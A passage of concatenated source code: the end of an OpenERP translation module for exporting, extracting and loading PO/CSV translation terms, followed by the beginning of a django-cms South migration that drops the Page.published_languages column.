source = unicode(source, 'utf8')
msg = "msgid %s\n" \
"msgstr %s\n\n" \
% (quote(source), quote(trad))
self.buffer.write(msg.encode('utf8'))
# Methods to export the translation file
def trans_export(lang, modules, buffer, format, cr):
def _process(format, modules, rows, buffer, lang):
if format == 'csv':
writer = csv.writer(buffer, 'UNIX')
# write header first
writer.writerow(("module","type","name","res_id","src","value"))
for module, type, name, res_id, src, trad, comments in rows:
# Comments are ignored by the CSV writer
writer.writerow((module, type, name, res_id, src, trad))
elif format == 'po':
writer = TinyPoFile(buffer)
writer.write_infos(modules)
# we now group the translations by source. That means one translation per source.
grouped_rows = {}
for module, type, name, res_id, src, trad, comments in rows:
row = grouped_rows.setdefault(src, {})
row.setdefault('modules', set()).add(module)
if not row.get('translation') and trad != src:
row['translation'] = trad
row.setdefault('tnrs', []).append((type, name, res_id))
row.setdefault('comments', set()).update(comments)
for src, row in sorted(grouped_rows.items()):
if not lang:
# translation template, so no translation value
row['translation'] = ''
elif not row.get('translation'):
row['translation'] = src
writer.write(row['modules'], row['tnrs'], src, row['translation'], row['comments'])
elif format == 'tgz':
rows_by_module = {}
for row in rows:
module = row[0]
rows_by_module.setdefault(module, []).append(row)
tmpdir = tempfile.mkdtemp()
for mod, modrows in rows_by_module.items():
tmpmoddir = join(tmpdir, mod, 'i18n')
os.makedirs(tmpmoddir)
pofilename = (lang if lang else mod) + ".po" + ('t' if not lang else '')
buf = file(join(tmpmoddir, pofilename), 'w')
_process('po', [mod], modrows, buf, lang)
buf.close()
tar = tarfile.open(fileobj=buffer, mode='w|gz')
tar.add(tmpdir, '')
tar.close()
else:
raise Exception(_('Unrecognized extension: must be one of '
'.csv, .po, or .tgz (received .%s).' % format))
translations = trans_generate(lang, modules, cr)
modules = set(t[0] for t in translations)
_process(format, modules, translations, buffer, lang)
del translations
def trans_parse_xsl(de):
return list(set(trans_parse_xsl_aux(de, False)))
def trans_parse_xsl_aux(de, t):
res = []
for n in de:
t = t or n.get("t")
if t:
if isinstance(n, SKIPPED_ELEMENT_TYPES) or n.tag.startswith('{http://www.w3.org/1999/XSL/Transform}'):
continue
if n.text:
l = n.text.strip().replace('\n',' ')
if len(l):
res.append(l.encode("utf8"))
if n.tail:
l = n.tail.strip().replace('\n',' ')
if len(l):
res.append(l.encode("utf8"))
res.extend(trans_parse_xsl_aux(n, t))
return res
def trans_parse_rml(de):
res = []
for n in de:
for m in n:
if isinstance(m, SKIPPED_ELEMENT_TYPES) or not m.text:
continue
string_list = [s.replace('\n', ' ').strip() for s in re.split('\[\[.+?\]\]', m.text)]
for s in string_list:
if s:
res.append(s.encode("utf8"))
res.extend(trans_parse_rml(n))
return res
def _push(callback, term, source_line):
""" Sanity check before pushing translation terms """
term = (term or "").strip().encode('utf8')
# Avoid non-char tokens like ':' '...' '.00' etc.
if len(term) > 8 or any(x.isalpha() for x in term):
callback(term, source_line)
def trans_parse_view(element, callback):
""" Helper method to recursively walk an etree document representing a
regular view and call ``callback(term)`` for each translatable term
that is found in the document.
:param ElementTree element: root of etree document to extract terms from
:param callable callback: a callable in the form ``f(term, source_line)``,
that will be called for each extracted term.
"""
for el in element.iter():
if (not isinstance(el, SKIPPED_ELEMENT_TYPES)
and el.tag.lower() not in SKIPPED_ELEMENTS
and el.get("translation", '').strip() != "off"
and el.text):
_push(callback, el.text, el.sourceline)
if el.tail:
_push(callback, el.tail, el.sourceline)
for attr in ('string', 'help', 'sum', 'confirm', 'placeholder'):
value = el.get(attr)
if value:
_push(callback, value, el.sourceline)
# tests whether an object is in a list of modules
def in_modules(object_name, modules):
if 'all' in modules:
return True
module_dict = {
'ir': 'base',
'res': 'base',
'workflow': 'base',
}
module = object_name.split('.')[0]
module = module_dict.get(module, module)
return module in modules
def _extract_translatable_qweb_terms(element, callback):
""" Helper method to walk an etree document representing
a QWeb template, and call ``callback(term)`` for each
translatable term that is found in the document.
:param etree._Element element: root of etree document to extract terms from
:param Callable callback: a callable in the form ``f(term, source_line)``,
that will be called for each extracted term.
"""
# not using elementTree.iterparse because we need to skip sub-trees in case
# the ancestor element had a reason to be skipped
for el in element:
if isinstance(el, SKIPPED_ELEMENT_TYPES): continue
if (el.tag.lower() not in SKIPPED_ELEMENTS
and "t-js" not in el.attrib
and not ("t-jquery" in el.attrib and "t-operation" not in el.attrib)
and el.get("t-translation", '').strip() != "off"):
_push(callback, el.text, el.sourceline)
for att in ('title', 'alt', 'label', 'placeholder'):
if att in el.attrib:
_push(callback, el.attrib[att], el.sourceline)
_extract_translatable_qweb_terms(el, callback)
_push(callback, el.tail, el.sourceline)
def babel_extract_qweb(fileobj, keywords, comment_tags, options):
"""Babel message extractor for qweb template files.
:param fileobj: the file-like object the messages should be extracted from
:param keywords: a list of keywords (i.e. function names) that should
be recognized as translation functions
:param comment_tags: a list of translator tags to search for and
include in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)``
tuples
:rtype: Iterable
"""
result = []
def handle_text(text, lineno):
result.append((lineno, None, text, []))
tree = etree.parse(fileobj)
_extract_translatable_qweb_terms(tree.getroot(), handle_text)
return result
def trans_generate(lang, modules, cr):
dbname = cr.dbname
registry = openerp.registry(dbname)
trans_obj = registry['ir.translation']
model_data_obj = registry['ir.model.data']
uid = 1
query = 'SELECT name, model, res_id, module' \
' FROM ir_model_data'
query_models = """SELECT m.id, m.model, imd.module
FROM ir_model AS m, ir_model_data AS imd
WHERE m.id = imd.res_id AND imd.model = 'ir.model' """
if 'all_installed' in modules:
query += ' WHERE module IN ( SELECT name FROM ir_module_module WHERE state = \'installed\') '
query_models += " AND imd.module in ( SELECT name FROM ir_module_module WHERE state = 'installed') "
query_param = None
if 'all' not in modules:
query += ' WHERE module IN %s'
query_models += ' AND imd.module in %s'
query_param = (tuple(modules),)
query += ' ORDER BY module, model, name'
query_models += ' ORDER BY module, model'
cr.execute(query, query_param)
_to_translate = set()
def push_translation(module, type, name, id, source, comments=None):
# empty and one-letter terms are ignored, they probably are not meant to be
# translated, and would be very hard to translate anyway.
if not source or len(source.strip()) <= 1:
return
tnx = (module, source, name, id, type, tuple(comments or ()))
_to_translate.add(tnx)
def encode(s):
if isinstance(s, unicode):
return s.encode('utf8')
return s
def push(mod, type, name, res_id, term):
term = (term or '').strip()
if len(term) > 2 or term in ENGLISH_SMALL_WORDS:
push_translation(mod, type, name, res_id, term)
def get_root_view(xml_id):
view = model_data_obj.xmlid_to_object(cr, uid, xml_id)
if view:
while view.mode != 'primary':
view = view.inherit_id
xml_id = view.get_external_id(cr, uid).get(view.id, xml_id)
return xml_id
for (xml_name,model,res_id,module) in cr.fetchall():
module = encode(module)
model = encode(model)
xml_name = "%s.%s" % (module, encode(xml_name))
if model not in registry:
_logger.error("Unable to find object %r", model)
continue
Model = registry[model]
if not Model._translate:
# explicitly disabled
continue
obj = Model.browse(cr, uid, res_id)
if not obj.exists():
_logger.warning("Unable to find object %r with id %d", model, res_id)
continue
if model=='ir.ui.view':
d = etree.XML(encode(obj.arch))
if obj.type == 'qweb':
view_id = get_root_view(xml_name)
push_qweb = lambda t,l: push(module, 'view', 'website', view_id, t)
_extract_translatable_qweb_terms(d, push_qweb)
else:
push_view = lambda t,l: push(module, 'view', obj.model, xml_name, t)
trans_parse_view(d, push_view)
elif model=='ir.actions.wizard':
pass # TODO Can model really be 'ir.actions.wizard' ?
elif model=='ir.model.fields':
try:
field_name = encode(obj.name)
except AttributeError, exc:
_logger.error("name error in %s: %s", xml_name, str(exc))
continue
objmodel = registry.get(obj.model)
if (objmodel is None or field_name not in objmodel._columns
or not objmodel._translate):
continue
field_def = objmodel._columns[field_name]
name = "%s,%s" % (encode(obj.model), field_name)
push_translation(module, 'field', name, 0, encode(field_def.string))
if field_def.help:
push_translation(module, 'help', name, 0, encode(field_def.help))
if field_def.translate:
ids = objmodel.search(cr, uid, [])
obj_values = objmodel.read(cr, uid, ids, [field_name])
for obj_value in obj_values:
res_id = obj_value['id']
if obj.name in ('ir.model', 'ir.ui.menu'):
res_id = 0
model_data_ids = model_data_obj.search(cr, uid, [
('model', '=', model),
('res_id', '=', res_id),
])
if not model_data_ids:
push_translation(module, 'model', name, 0, encode(obj_value[field_name]))
if hasattr(field_def, 'selection') and isinstance(field_def.selection, (list, tuple)):
for dummy, val in field_def.selection:
push_translation(module, 'selection', name, 0, encode(val))
elif model=='ir.actions.report.xml':
name = encode(obj.report_name)
fname = ""
if obj.report_rml:
fname = obj.report_rml
parse_func = trans_parse_rml
report_type = "report"
elif obj.report_xsl:
fname = obj.report_xsl
parse_func = trans_parse_xsl
report_type = "xsl"
if fname and obj.report_type in ('pdf', 'xsl'):
try:
report_file = misc.file_open(fname)
try:
d = etree.parse(report_file)
for t in parse_func(d.iter()):
push_translation(module, report_type, name, 0, t)
finally:
report_file.close()
except (IOError, etree.XMLSyntaxError):
_logger.exception("couldn't export translation for report %s %s %s", name, report_type, fname)
for field_name, field_def in obj._columns.items():
if model == 'ir.model' and field_name == 'name' and obj.name == obj.model:
# ignore model name if it is the technical one, nothing to translate
continue
if field_def.translate:
name = model + "," + field_name
try:
term = obj[field_name] or ''
except:
term = ''
push_translation(module, 'model', name, xml_name, encode(term))
# End of data for ir.model.data query results
cr.execute(query_models, query_param)
def push_constraint_msg(module, term_type, model, msg):
if not hasattr(msg, '__call__'):
push_translation(encode(module), term_type, encode(model), 0, encode(msg))
def push_local_constraints(module, model, cons_type='sql_constraints'):
"""Climb up the class hierarchy and ignore inherited constraints
from other modules"""
term_type = 'sql_constraint' if cons_type == 'sql_constraints' else 'constraint'
msg_pos = 2 if cons_type == 'sql_constraints' else 1
for cls in model.__class__.__mro__:
if getattr(cls, '_module', None) != module:
continue
constraints = getattr(cls, '_local_' + cons_type, [])
for constraint in constraints:
push_constraint_msg(module, term_type, model._name, constraint[msg_pos])
for (_, model, module) in cr.fetchall():
if model not in registry:
_logger.error("Unable to find object %r", model)
continue
model_obj = registry[model]
if model_obj._constraints:
push_local_constraints(module, model_obj, 'constraints')
if model_obj._sql_constraints:
push_local_constraints(module, model_obj, 'sql_constraints')
installed_modules = map(
lambda m: m['name'],
registry['ir.module.module'].search_read(cr, uid, [('state', '=', 'installed')], fields=['name']))
path_list = [(path, True) for path in openerp.modules.module.ad_paths]
# Also scan these non-addon paths
for bin_path in ['osv', 'report', 'modules', 'service', 'tools']:
path_list.append((os.path.join(config.config['root_path'], bin_path), True))
# non-recursive scan for individual files in root directory but without
# scanning subdirectories that may contain addons
path_list.append((config.config['root_path'], False))
_logger.debug("Scanning modules at paths: %s", path_list)
def get_module_from_path(path):
for (mp, rec) in path_list:
if rec and path.startswith(mp) and os.path.dirname(path) != mp:
path = path[len(mp)+1:]
return path.split(os.path.sep)[0]
return 'base' # files that are not in a module are considered as being in 'base' module
def verified_module_filepaths(fname, path, root):
fabsolutepath = join(root, fname)
frelativepath = fabsolutepath[len(path):]
display_path = "addons%s" % frelativepath
module = get_module_from_path(fabsolutepath)
if ('all' in modules or module in modules) and module in installed_modules:
if os.path.sep != '/':
display_path = display_path.replace(os.path.sep, '/')
return module, fabsolutepath, frelativepath, display_path
return None, None, None, None
def babel_extract_terms(fname, path, root, extract_method="python", trans_type='code',
extra_comments=None, extract_keywords={'_': None}):
module, fabsolutepath, _, display_path = verified_module_filepaths(fname, path, root)
extra_comments = extra_comments or []
if not module: return
src_file = open(fabsolutepath, 'r')
try:
for extracted in extract.extract(extract_method, src_file,
keywords=extract_keywords):
# Babel 0.9.6 yields lineno, message, comments
# Babel 1.3 yields lineno, message, comments, context
lineno, message, comments = extracted[:3]
push_translation(module, trans_type, display_path, lineno,
encode(message), comments + extra_comments)
except Exception:
_logger.exception("Failed to extract terms from %s", fabsolutepath)
finally:
src_file.close()
for (path, recursive) in path_list:
_logger.debug("Scanning files of modules at %s", path)
for root, dummy, files in osutil.walksymlinks(path):
for fname in fnmatch.filter(files, '*.py'):
babel_extract_terms(fname, path, root)
# mako provides a babel extractor: http://docs.makotemplates.org/en/latest/usage.html#babel
for fname in fnmatch.filter(files, '*.mako'):
babel_extract_terms(fname, path, root, 'mako', trans_type='report')
# Javascript source files in the static/src/js directory, rest is ignored (libs)
if fnmatch.fnmatch(root, '*/static/src/js*'):
for fname in fnmatch.filter(files, '*.js'):
babel_extract_terms(fname, path, root, 'javascript',
extra_comments=[WEB_TRANSLATION_COMMENT],
extract_keywords={'_t': None, '_lt': None})
# QWeb template files
if fnmatch.fnmatch(root, '*/static/src/xml*'):
for fname in fnmatch.filter(files, '*.xml'):
babel_extract_terms(fname, path, root, 'openerp.tools.translate:babel_extract_qweb',
extra_comments=[WEB_TRANSLATION_COMMENT])
if not recursive:
# due to topdown, first iteration is in first level
break
out = []
# translate strings marked as to be translated
for module, source, name, id, type, comments in sorted(_to_translate):
trans = '' if not lang else trans_obj._get_source(cr, uid, name, type, lang, source)
out.append((module, type, name, id, source, encode(trans) or '', comments))
return out
def trans_load(cr, filename, lang, verbose=True, module_name=None, context=None):
try:
fileobj = misc.file_open(filename)
_logger.info("loading %s", filename)
fileformat = os.path.splitext(filename)[-1][1:].lower()
result = trans_load_data(cr, fileobj, fileformat, lang, verbose=verbose, module_name=module_name, context=context)
fileobj.close()
return result
except IOError:
if verbose:
_logger.error("couldn't read translation file %s", filename)
return None
def trans_load_data(cr, fileobj, fileformat, lang, lang_name=None, verbose=True, module_name=None, context=None):
"""Populates the ir_translation table."""
if verbose:
_logger.info('loading translation file for language %s', lang)
if context is None:
context = {}
db_name = cr.dbname
registry = openerp.registry(db_name)
lang_obj = registry.get('res.lang')
trans_obj = registry.get('ir.translation')
iso_lang = misc.get_iso_codes(lang)
try:
ids = lang_obj.search(cr, SUPERUSER_ID, [('code','=', lang)])
if not ids:
# lets create the language with locale information
lang_obj.load_lang(cr, SUPERUSER_ID, lang=lang, lang_name=lang_name)
# Parse also the POT: it will possibly provide additional targets.
# (Because the POT comments are correct on Launchpad but not the
# PO comments due to a Launchpad limitation. See LP bug 933496.)
pot_reader = []
# now, the serious things: we read the language file
fileobj.seek(0)
if fileformat == 'csv':
reader = csv.reader(fileobj, quotechar='"', delimiter=',')
# read the first line of the file (it contains columns titles)
for row in reader:
fields = row
break
elif fileformat == 'po':
reader = TinyPoFile(fileobj)
fields = ['type', 'name', 'res_id', 'src', 'value', 'comments']
# Make a reader for the POT file and be somewhat defensive for the
# stable branch.
if fileobj.name.endswith('.po'):
try:
# Normally the path looks like /path/to/xxx/i18n/lang.po
# and we try to find the corresponding
# /path/to/xxx/i18n/xxx.pot file.
# (Sometimes we have 'i18n_extra' instead of just 'i18n')
addons_module_i18n, _ = os.path.split(fileobj.name)
addons_module, i18n_dir = os.path.split(addons_module_i18n)
addons, module = os.path.split(addons_module)
pot_handle = misc.file_open(os.path.join(
addons, module, i18n_dir, module + '.pot'))
pot_reader = TinyPoFile(pot_handle)
except:
pass
else:
_logger.error('Bad file format: %s', fileformat)
raise Exception(_('Bad file format'))
# Read the POT references, and keep them indexed by source string.
class Target(object):
def __init__(self):
self.value = None
self.targets = set() # set of (type, name, res_id)
self.comments = None
pot_targets = defaultdict(Target)
for type, name, res_id, src, _, comments in pot_reader:
if type is not None:
target = pot_targets[src]
target.targets.add((type, name, res_id))
target.comments = comments
# read the rest of the file
irt_cursor = trans_obj._get_import_cursor(cr, SUPERUSER_ID, context=context)
def process_row(row):
"""Process a single PO (or POT) entry."""
# dictionary which holds values for this line of the csv file
# {'lang': ..., 'type': ..., 'name': ..., 'res_id': ...,
# 'src': ..., 'value': ..., 'module':...}
dic = dict.fromkeys(('type', 'name', 'res_id', 'src', 'value',
'comments', 'imd_model', 'imd_name', 'module'))
dic['lang'] = lang
dic.update(zip(fields, row))
# discard the target from the POT targets.
src = dic['src']
if src in pot_targets:
target = pot_targets[src]
target.value = dic['value']
target.targets.discard((dic['type'], dic['name'], dic['res_id']))
# This would skip terms that fail to specify a res_id
res_id = dic['res_id']
if not res_id:
return
if isinstance(res_id, (int, long)) or \
(isinstance(res_id, basestring) and res_id.isdigit()):
dic['res_id'] = int(res_id)
dic['module'] = module_name
else:
# res_id is an xml id
dic['res_id'] = None
dic['imd_model'] = dic['name'].split(',')[0]
if '.' in res_id:
dic['module'], dic['imd_name'] = res_id.split('.', 1)
else:
dic['module'], dic['imd_name'] = False, res_id
irt_cursor.push(dic)
# First process the entries from the PO file (doing so also fills/removes
# the entries from the POT file).
for row in reader:
process_row(row)
# Then process the entries implied by the POT file (which is more
# correct w.r.t. the targets) if some of them remain.
pot_rows = []
for src, target in pot_targets.iteritems():
if target.value:
for type, name, res_id in target.targets:
pot_rows.append((type, name, res_id, src, target.value, target.comments))
pot_targets.clear()
for row in pot_rows:
process_row(row)
irt_cursor.finish()
trans_obj.clear_caches()
if verbose:
_logger.info("translation file loaded succesfully")
except IOError:
filename = '[lang: %s][format: %s]' % (iso_lang or 'new', fileformat)
_logger.exception("couldn't read translation file %s", filename)
def get_locales(lang=None):
if lang is None:
lang = locale.getdefaultlocale()[0]
if os.name == 'nt':
lang = _LOCALE2WIN32.get(lang, lang)
def process(enc):
ln = locale._build_localename((lang, enc))
yield ln
nln = locale.normalize(ln)
if nln != ln:
yield nln
for x in process('utf8'): yield x
prefenc = locale.getpreferredencoding()
if prefenc:
for x in process(prefenc): yield x
prefenc = {
'latin1': 'latin9',
'iso-8859-1': 'iso8859-15',
'cp1252': '1252',
}.get(prefenc.lower())
if prefenc:
for x in process(prefenc): yield x
yield lang
def resetlocale():
# locale.resetlocale is bugged with some locales.
for ln in get_locales():
try:
return locale.setlocale(locale.LC_ALL, ln)
except locale.Error:
continue
def load_language(cr, lang):
"""Loads a translation terms for a language.
Used mainly to automate language loading at db initialization.
:param lang: language ISO code with optional _underscore_ and l10n flavor (ex: 'fr', 'fr_BE', but not 'fr-BE')
:type lang: str
"""
registry = openerp.registry(cr.dbname)
language_installer = registry['base.language.install']
oid = language_installer.create(cr, SUPERUSER_ID, {'lang': lang})
language_installer.lang_install(cr, SUPERUSER_ID, [oid], context=None)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rscnt/django-cms | cms/south_migrations/0056_auto__del_field_page_published_languages.py | 63 | 18273 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Page.published_languages'
db.delete_column(u'cms_page', 'published_languages')
def backwards(self, orm):
# Adding field 'Page.published_languages'
db.add_column(u'cms_page', 'published_languages',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.globalpagepermission': {
'Meta': {'object_name': 'GlobalPagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'cms.page': {
'Meta': {'ordering': "('tree_id', 'lft')", 'unique_together': "(('publisher_is_draft', 'application_namespace'),)", 'object_name': 'Page'},
'application_namespace': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_home': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'languages': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'revision_id': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'djangocms_pages'", 'to': u"orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'default': "'INHERIT'", 'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagemoderatorstate': {
'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
'cms.pagepermission': {
'Meta': {'object_name': 'PagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'cms.pageuser': {
'Meta': {'object_name': 'PageUser', '_ormbases': [u'auth.User']},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': u"orm['auth.User']"}),
u'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'cms.pageusergroup': {
'Meta': {'object_name': 'PageUserGroup', '_ormbases': [u'auth.Group']},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': u"orm['auth.User']"}),
u'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cms.placeholderreference': {
'Meta': {'object_name': 'PlaceholderReference', 'db_table': "u'cmsplugin_placeholderreference'", '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'placeholder_ref': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'})
},
'cms.staticplaceholder': {
'Meta': {'object_name': 'StaticPlaceholder'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'blank': 'True'}),
'creation_method': ('django.db.models.fields.CharField', [], {'default': "'code'", 'max_length': '20', 'blank': 'True'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
